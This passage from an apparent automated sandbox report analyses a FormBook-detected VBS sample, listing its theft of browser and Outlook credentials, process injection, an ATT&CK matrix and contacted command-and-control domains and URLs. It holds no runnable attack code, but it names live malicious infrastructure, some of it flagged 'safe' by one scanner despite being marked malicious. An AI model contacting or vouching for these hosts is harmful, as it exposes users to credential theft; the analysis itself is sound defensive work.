            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E97670 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_61E97670
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E231B6 sqlite3_bind_text64,5_2_61E231B6
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E2318F sqlite3_bind_text,5_2_61E2318F
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E23148 sqlite3_bind_blob64,5_2_61E23148
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E23121 sqlite3_mutex_leave,sqlite3_bind_blob,5_2_61E23121
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E23002 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_61E23002
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E03361 sqlite3_bind_parameter_count,5_2_61E03361
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E03373 sqlite3_bind_parameter_name,5_2_61E03373
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E0328A sqlite3_value_frombind,5_2_61E0328A
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E2324A sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,5_2_61E2324A
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E23223 sqlite3_bind_text16,5_2_61E23223
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E0A583 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,5_2_61E0A583
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E22DF9 sqlite3_bind_double,sqlite3_mutex_leave,5_2_61E22DF9
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E22F95 sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_61E22F95
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E10F3B sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,5_2_61E10F3B
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E22F18 sqlite3_bind_pointer,sqlite3_mutex_leave,5_2_61E22F18
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E22EE7 sqlite3_bind_null,sqlite3_mutex_leave,5_2_61E22EE7
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E22EC1 sqlite3_bind_int,sqlite3_bind_int64,5_2_61E22EC1
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E17E83 sqlite3_bind_parameter_index,5_2_61E17E83
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E22E72 sqlite3_bind_int64,sqlite3_mutex_leave,5_2_61E22E72

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting            		Valid Accounts1
            Native API            		121
            Scripting            		1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop Protocol1
            Browser Session Hijacking            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)511
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager16
            System Information Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information            		NTDS21
            Security Software Discovery            		Distributed Component Object Model1
            Email Collection            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt511
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1554308 Sample: 0CkEHZjZgO.vbs Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Yara detected FormBook 2->52 54 6 other signatures 2->54 10 wscript.exe 2 2->10         started        process3 file4 36 C:\Users\user\AppData\...\temp_file_rhjRS.exe, PE32 10->36 dropped 68 Benign windows process drops PE files 10->68 70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->70 72 Suspicious execution chain found 10->72 14 temp_file_rhjRS.exe 2 10->14         started        signatures5 process6 signatures7 78 Antivirus detection for dropped file 14->78 80 Machine Learning detection for dropped file 14->80 82 Writes to foreign memory regions 14->82 84 2 other signatures 14->84 17 RegAsm.exe 14->17         started        process8 signatures9 46 Maps a DLL or memory area into another process 17->46 20 LHXJJggpVplOZ.exe 17->20 injected process10 signatures11 56 Maps a DLL or memory area into another process 20->56 58 Found direct / indirect Syscall (likely to bypass EDR) 20->58 23 gpupdate.exe 1 20 20->23         started        process12 dnsIp13 38 www.sqlite.org 45.33.6.223, 49166, 80 LINODE-APLinodeLLCUS United States 23->38 34 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 23->34 dropped 60 Tries to steal Mail credentials (via file / registry access) 23->60 62 Tries to harvest and steal browser information (history, passwords, etc) 23->62 64 Maps a DLL or memory area into another process 23->64 66 Queues an APC in another process (thread injection) 23->66 28 LHXJJggpVplOZ.exe 23->28 injected 32 firefox.exe 23->32         started        file14 signatures15 process16 dnsIp17 40 www.vasehub.xyz 28->40 42 myjiorooms.services 15.197.148.33, 49167, 49168, 49169 TANDEMUS United States 28->42 44 3 other IPs or domains 28->44 74 Found direct / indirect Syscall (likely to bypass EDR) 28->74 signatures18 76 Performs DNS queries to domains with low reputation 40->76

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.vasehub.xyz/uzgu/0%Avira URL Cloudsafe
            http://www.myjiorooms.services/fksk/?3VXDE=Da/YB3Khdl1nHqF+sXSftOGWFPDcK1D40N3MmeZhH+yFl3LdN7J6XJQSvkWEDqgMgq2RkLMqt/sISVLUgAiTepatAcdQK/RR2laDsmCNg7CjeO0+DkiAxRGVn1KL&XJNx=abrdnJXXqdPhC0%Avira URL Cloudsafe
            http://www.myjiorooms.services/fksk/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.vasehub.xyz
            		162.213.249.216
            		truetrue
              		unknown
              www.sqlite.org
              		45.33.6.223
              		truefalse
                		high
                myjiorooms.services
                		15.197.148.33
                		truetrue
                  		unknown
                  www.kevin-torkelson.info
                  		208.91.197.27
                  		truetrue
                    		unknown
                    www.myjiorooms.services
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zipfalse
                        		high
                        http://www.myjiorooms.services/fksk/?3VXDE=Da/YB3Khdl1nHqF+sXSftOGWFPDcK1D40N3MmeZhH+yFl3LdN7J6XJQSvkWEDqgMgq2RkLMqt/sISVLUgAiTepatAcdQK/RR2laDsmCNg7CjeO0+DkiAxRGVn1KL&XJNx=abrdnJXXqdPhCtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.myjiorooms.services/fksk/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.vasehub.xyz/uzgu/true
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        15.197.148.33
                        		myjiorooms.servicesUnited States
                        		7430TANDEMUStrue
                        45.33.6.223
                        		www.sqlite.orgUnited States
                        		63949LINODE-APLinodeLLCUSfalse
                        208.91.197.27
                        		www.kevin-torkelson.infoVirgin Islands (BRITISH)
                        		40034CONFLUENCE-NETWORK-INCVGtrue
                        162.213.249.216
                        		www.vasehub.xyzUnited States
                        		22612NAMECHEAP-NETUStrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1554308
                        Start date and time:2024-11-12 11:17:29 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 44s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:0CkEHZjZgO.vbs
                        renamed because original name is a hash value
                        Original Sample Name:479fe21d1995faa9e2f152dfae09e949.vbs
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winVBS@9/6@4/4
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 73%
                        • Number of executed functions: 36
                        • Number of non-executed functions: 183
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: 0CkEHZjZgO.vbs

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        05:18:25API Interceptor108x Sleep call for process: wscript.exe modified
                        05:18:36API Interceptor2x Sleep call for process: temp_file_rhjRS.exe modified
                        05:19:40API Interceptor556x Sleep call for process: LHXJJggpVplOZ.exe modified
                        05:19:45API Interceptor148589x Sleep call for process: gpupdate.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        15.197.148.33RFQ.docxGet hashmaliciousFormBookBrowse
                        • www.maryneedskidneys.info/tqdg/
                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                        • www.energyparks.net/k47i/
                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                        • www.hyman.life/7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8
                        Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.ninesquare.games/42mc/
                        IND24072113.xlsxGet hashmaliciousUnknownBrowse
                        • www.jilifish.win/to3j/
                        ekte.exeGet hashmaliciousFormBookBrowse
                        • www.childlesscatlady.today/0l08/
                        IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                        • www.jilifish.win/to3j/
                        AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                        • www.1clickw2.net/9bnb/
                        BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                        • www.ethetf.digital/m7sk/
                        LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                        • www.warriorsyndrome.net/yaso/
                        45.33.6.223RFQ.docxGet hashmaliciousFormBookBrowse
                        • www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                        • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                        Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                        • www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
                        SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                        • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                        IND24072113.xlsxGet hashmaliciousUnknownBrowse
                        • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                        ekte.exeGet hashmaliciousFormBookBrowse
                        • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                        IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                        • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                        SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                        • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                        New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                        • www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip
                        BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                        • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        www.sqlite.orgRFQ.docxGet hashmaliciousFormBookBrowse
                        • 45.33.6.223
                        Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                        • 45.33.6.223
                        kht87CiL7C.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                        • 45.33.6.223
                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                        • 45.33.6.223
                        KSACURFQAAB01.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                        • 45.33.6.223
                        Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                        • 45.33.6.223
                        Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                        • 45.33.6.223
                        SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                        • 45.33.6.223
                        IND24072113.xlsxGet hashmaliciousUnknownBrowse
                        • 45.33.6.223
                        ekte.exeGet hashmaliciousFormBookBrowse
                        • 45.33.6.223
                        www.kevin-torkelson.infoProduct Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        www.vasehub.xyzOrder.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • 162.213.249.216

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        TANDEMUShttps://certify-compte.fr/CETELGet hashmaliciousUnknownBrowse
                        • 15.197.130.221
                        uXK5hq53r7.exeGet hashmaliciousSimda StealerBrowse
                        • 15.197.130.221
                        2m7DLHWhxp.exeGet hashmaliciousSimda StealerBrowse
                        • 15.197.130.221
                        2w6qmU17rQ.exeGet hashmaliciousSimda StealerBrowse
                        • 15.197.130.221
                        E06V9T0WiQ.exeGet hashmaliciousSimda StealerBrowse
                        • 15.197.130.221
                        jYCuKbE5wl.exeGet hashmaliciousSimda StealerBrowse
                        • 15.197.130.221
                        RFQ.docxGet hashmaliciousFormBookBrowse
                        • 15.197.148.33
                        https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36Get hashmaliciousUnknownBrowse
                        • 15.197.193.217
                        4GsYBMtqCN.msiGet hashmaliciousUnknownBrowse
                        • 15.197.137.111
                        Mdgbxdb9ho.msiGet hashmaliciousUnknownBrowse
                        • 15.197.137.111
                        CONFLUENCE-NETWORK-INCVGSelected_Items.vbsGet hashmaliciousFormBookBrowse
                        • 208.91.197.27
                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                        • 199.191.50.83
                        LINODE-APLinodeLLCUSArrival Notice.exeGet hashmaliciousFormBookBrowse
                        • 96.126.123.244
                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                        • 45.79.19.196
                        mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                        • 45.33.77.42
                        75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                        • 212.71.237.140
                        Maryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                        • 45.79.252.94
                        RFQ.docxGet hashmaliciousFormBookBrowse
                        • 45.33.6.223
                        Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                        • 45.79.252.94
                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                        • 45.33.6.223
                        https://majorbrdide.comGet hashmaliciousUnknownBrowse
                        • 173.255.204.62
                        DHL_doc.exeGet hashmaliciousFormBookBrowse
                        • 45.79.252.94

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\sqlite3.dll350.xlsGet hashmaliciousFormBookBrowse
                          Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                            Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                              Quotation_package_RFQ_10750.xlsGet hashmaliciousFormBookBrowse
                                pol.xlam.xlsxGet hashmaliciousFormBookBrowse
                                  Import GeorgiaTbilisi GANSKHVAVEBULI IT 43036.xlsGet hashmaliciousFormBookBrowse
